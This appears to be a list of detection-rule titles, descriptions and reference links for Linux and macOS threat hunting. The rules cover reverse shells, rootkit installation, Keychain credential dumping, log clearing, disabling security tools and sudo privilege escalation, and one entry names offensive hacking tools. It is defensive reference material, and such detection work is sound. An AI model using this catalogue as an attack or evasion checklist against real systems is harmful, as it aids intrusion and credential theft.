Linux Remote System Discovery Detects the enumeration of other remote systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Linux Package Uninstall Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". https://sysdig.com/blog/mitre-defense-evasion-falco, https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command, https://linuxhint.com/uninstall_yum_package/, https://linuxhint.com/uninstall-debian-packages/
Shell Execution via Rsync - Linux Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/rsync/#shell
Suspicious Invocation of Shell via Rsync Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/, https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10
Potential Ruby Reverse Shell Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Scheduled Cron Task/Job - Linux Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Security Software Discovery - Linux Detects usage of system utilities (only grep and egrep for now) to discover security software discovery https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
Disabling Security Tools Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
Disable Or Stop Services Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
Setuid and Setgid Detects suspicious change of file privileges with chown and chmod commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md, https://attack.mitre.org/techniques/T1548/001/
Shell Invocation Via Ssh - Linux Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/ssh/, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Potential Linux Amazon SSM Agent Hijacking Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
Sudo Privilege Escalation CVE-2019-14287 Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546
Chmod Suspicious Directory Detects chmod targeting files in abnormal directory paths. https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Container Residence Discovery Via Proc Virtual FS Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Suspicious Curl File Upload - Linux Detects a suspicious curl process start the adds a file to a web request https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html, https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Suspicious Curl Change User Agents - Linux Detects a suspicious curl process start on linux with set useragent options https://curl.se/docs/manpage.html
Docker Container Discovery Via Dockerenv Listing Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Potentially Suspicious Execution From Tmp Folder Detects a potentially suspicious execution of a process located in the '/tmp/' folder https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Potential Discovery Activity Using Find - Linux Detects usage of "find" binary in a suspicious manner to perform discovery https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
Suspicious Git Clone - Linux Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
History File Deletion Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Print History File Contents Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Linux HackTool Execution Detects known hacktool execution based on image name. https://github.com/Gui774ume/ebpfkit, https://github.com/pathtofile/bad-bpf, https://github.com/carlospolop/PEASS-ng, https://github.com/t3l3machus/hoaxshell, https://github.com/t3l3machus/Villain, https://github.com/HavocFramework/Havoc, https://github.com/1N3/Sn1per, https://github.com/Ne0nd0g/merlin, https://github.com/Pennyw0rth/NetExec/
Potential Container Discovery Via Inodes Listing Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Interactive Bash Suspicious Children Detects suspicious interactive bash as a parent to rather uncommon child processes Internal Research
Suspicious Java Children Processes Detects java process spawning suspicious children https://www.tecmint.com/different-types-of-linux-shells/
Linux Network Service Scanning Tools Execution Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md, https://github.com/projectdiscovery/naabu, https://github.com/Tib3rius/AutoRecon
Linux Shell Pipe to Shell Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell Internal Research
Linux Recon Indicators Detects events with patterns found in commands used for reconnaissance on linux systems https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
Potential Suspicious Change To Sensitive/Critical Files Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
Execution Of Script Located In Potentially Suspicious Directory Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Shell Execution Of Process Located In Tmp Directory Detects execution of shells from a parent process located in a temporary (/tmp) directory https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
System Information Discovery Detects system information discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md
System Network Connections Discovery - Linux Detects usage of system utilities to discover system network connections https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
System Network Discovery - Linux Detects enumeration of local network configuration https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
Touch Suspicious Service File Detects usage of the "touch" process in service file. https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Triple Cross eBPF Rootkit Execve Hijack Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
Triple Cross eBPF Rootkit Install Commands Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
User Has Been Deleted Via Userdel Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/userdel
User Added To Root/Sudoers Group Using Usermod Detects usage of the "usermod" binary to add users add users to the root or suoders groups https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/, https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
Vim GTFOBin Abuse - Linux Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/vim/, https://gtfobins.github.io/gtfobins/rvim/, https://gtfobins.github.io/gtfobins/vimdiff/
Linux Webshell Indicators Detects suspicious sub processes of web server processes https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
Download File To Potentially Suspicious Directory Via Wget Detects the use of wget to download content to a suspicious directory https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Potential Xterm Reverse Shell Detects usage of "xterm" as a potential reverse shell tunnel https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
MacOS Emond Launch Daemon Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md, https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
Startup Item File Created - MacOS Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md, https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
MacOS Scripting Interpreter AppleScript Detects execution of AppleScript of the macOS scripting language AppleScript. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md, https://redcanary.com/blog/applescript/
Decode Base64 Encoded Text -MacOs Detects usage of base64 utility to decode arbitrary base64-encoded text https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
Binary Padding - MacOS Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md, https://linux.die.net/man/1/truncate, https://linux.die.net/man/1/dd
File Time Attribute Change Detect file time attribute change to hide new or changes to existing files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
Hidden Flag Set On File/Directory Via Chflags - MacOS Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf, https://ss64.com/mac/chflags.html
Indicator Removal on Host - Clear Mac System Logs Detects deletion of local audit logs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Clipboard Data Collection Via OSAScript Detects possible collection of data from the clipboard via execution of the osascript binary https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
Creation Of A Local User Account Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md, https://ss64.com/osx/sysadminctl.html
Hidden User Creation Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md
Credentials from Password Stores - Keychain Detects passwords dumps from Keychain https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md, https://gist.github.com/Capybara/6228955
System Integrity Protection (SIP) Disabled Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
System Integrity Protection (SIP) Enumeration Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
Disable Security Tools Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
User Added To Admin Group Via Dscl Detects attempts to create and add an account to the admin group via "dscl" https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos, https://ss64.com/osx/dscl.html
User Added To Admin Group Via DseditGroup Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos, https://ss64.com/osx/dseditgroup.html
Root Account Enable Via Dsenableroot Detects attempts to enable the root account via "dsenableroot" https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml, https://ss64.com/osx/dsenableroot.html
File and Directory Discovery - MacOS Detects usage of system utilities to discover files and directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
Credentials In Files Detecting attempts to extract passwords with grep and laZagne https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
GUI Input Capture - macOS Detects attempts to use system dialog prompts to capture user credentials https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md, https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/
Disk Image Creation Via Hdiutil - MacOS Detects the execution of the hdiutil utility in order to create a disk image. https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html
Disk Image Mounting Via Hdiutil - MacOS Detects the execution of the hdiutil utility in order to mount disk images. https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html
Suspicious Installer Package Child Process Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
System Information Discovery Using Ioreg Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior, https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior, https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior, https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html
JAMF MDM Potential Suspicious Child Process Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
JAMF MDM Execution Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
JXA In-memory Execution Via OSAScript Detects possible malicious execution of JXA in-memory via OSAScript https://redcanary.com/blog/applescript/
Launch Agent/Daemon Execution Via Launchctl Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/, https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html, https://www.loobins.io/binaries/launchctl/
Local System Accounts Discovery - MacOs Detects enumeration of local systeam accounts on MacOS https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
Local Groups Discovery - MacOs Detects enumeration of local system groups https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
MacOS Network Service Scanning Detects enumeration of local or remote network services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
Network Sniffing - MacOs Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
File Download Via Nscurl - MacOS Detects the execution of the nscurl utility in order to download files. https://www.loobins.io/binaries/nscurl/, https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl, https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd
Suspicious Microsoft Office Child Process - MacOS Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution https://redcanary.com/blog/applescript/, https://objective-see.org/blog/blog_0x4B.html
OSACompile Run-Only Execution Detects potential suspicious run-only executions compiled using OSACompile https://redcanary.com/blog/applescript/, https://ss64.com/osx/osacompile.html
Payload Decoded and Decrypted via Built-in Utilities Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823
Potential Persistence Via PlistBuddy Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://www.manpagez.com/man/8/PlistBuddy/
Remote Access Tool - Team Viewer Session Started On MacOS Host Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
Macos Remote System Discovery Detects the enumeration of other remote systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Scheduled Cron Task/Job - MacOs Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Screen Capture - macOS Detects attempts to use screencapture to collect macOS screenshots https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py
Security Software Discovery - MacOs Detects usage of system utilities (only grep for now) to discover security software discovery https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
Space After Filename - macOS Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md
Split A File Into Pieces Detection use of the command "split" to split files into parts and possible transfer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
Osacompile Execution By Potentially Suspicious Applet/Osascript Detects potential suspicious applet or osascript executing "osacompile". https://redcanary.com/blog/mac-application-bundles/
Suspicious Browser Child Process - MacOS Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
Suspicious Execution via macOS Script Editor Detects when the macOS Script Editor utility spawns an unusual child process. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685, https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
Potential Discovery Activity Using Find - MacOS Detects usage of "find" binary in a suspicious manner to perform discovery https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
Suspicious History File Operations Detects commandline operations on shell history files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Potential In-Memory Download And Compile Of Payloads Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware https://redcanary.com/blog/mac-application-bundles/
Suspicious MacOS Firmware Activity Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml, https://www.manpagez.com/man/8/firmwarepasswd/, https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web
System Network Discovery - macOS Detects enumeration of local network configuration https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
System Information Discovery Using sw_vers Detects the use of "sw_vers" for system information discovery https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior, https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior, https://ss64.com/osx/sw_vers.html
User Added To Admin Group Via Sysadminctl Detects attempts to create and add an account to the admin group via "sysadminctl" https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/sysadminctl.html
Guest Account Enabled Via Sysadminctl Detects attempts to enable the guest account using the sysadminctl utility https://ss64.com/osx/sysadminctl.html
System Information Discovery Via Sysctl - MacOS Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments. https://www.loobins.io/binaries/sysctl/#, https://evasions.checkpoint.com/techniques/macos.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://objective-see.org/blog/blog_0x1E.html, https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior, https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior
System Information Discovery Using System_Profiler Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html, https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf, https://ss64.com/mac/system_profiler.html, https://objective-see.org/blog/blog_0x62.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af
System Network Connections Discovery - MacOs Detects usage of system utilities to discover system network connections https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
System Shutdown/Reboot - MacOs Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
Potential Base64 Decoded From Images Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior, https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior
